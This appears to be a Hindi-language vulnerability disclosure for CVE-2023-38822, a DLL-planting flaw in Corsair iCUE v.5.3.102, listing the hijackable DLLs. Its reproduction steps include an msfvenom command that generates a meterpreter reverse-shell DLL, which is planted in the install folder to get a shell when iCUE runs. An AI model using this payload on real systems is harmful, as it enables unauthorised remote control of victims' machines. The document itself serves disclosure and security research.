Corsair---DLL-Planting-CVE-2023-38822
Corsair iCUE v.5.3.102 CVE-2023-38822 में DLL प्लांटिंग
खोजकर्ता: Idan Malihi
विवरण
Corsair iCUE v.5.3.102 में एक समस्या स्थानीय हमलावर को MPDC.dll, CRYPTSP.dll, dcomp.dll, profapi.dll और MSASN1.dll घटकों के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।
पुनरुत्पादन के चरण
DLL प्लांटिंग भेद्यता का शोषण करने के लिए, एक हमलावर को निम्नलिखित चरणों का पालन करना चाहिए:
- iCUE का नवीनतम संस्करण डाउनलोड करें।
- iCUE उत्पाद स्थापित करें।
- स्थापना पथ फ़ोल्डर खोलें, उदाहरण के लिए, C:\Program Files\Corsair\Corsair iCUE5 Software\
- Kali Linux OS पर msfvenom के साथ एक दुर्भावनापूर्ण dll फ़ाइल बनाएँ:
msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o CRYPTSP.dll
- DLL फ़ाइल को गेम के पथ C:\Program Files\Corsair\Corsair iCUE5 Software\ पर स्थानांतरित करें।
- iCUE.exe चलाएँ और एक रिवर्स शेल प्राप्त करें।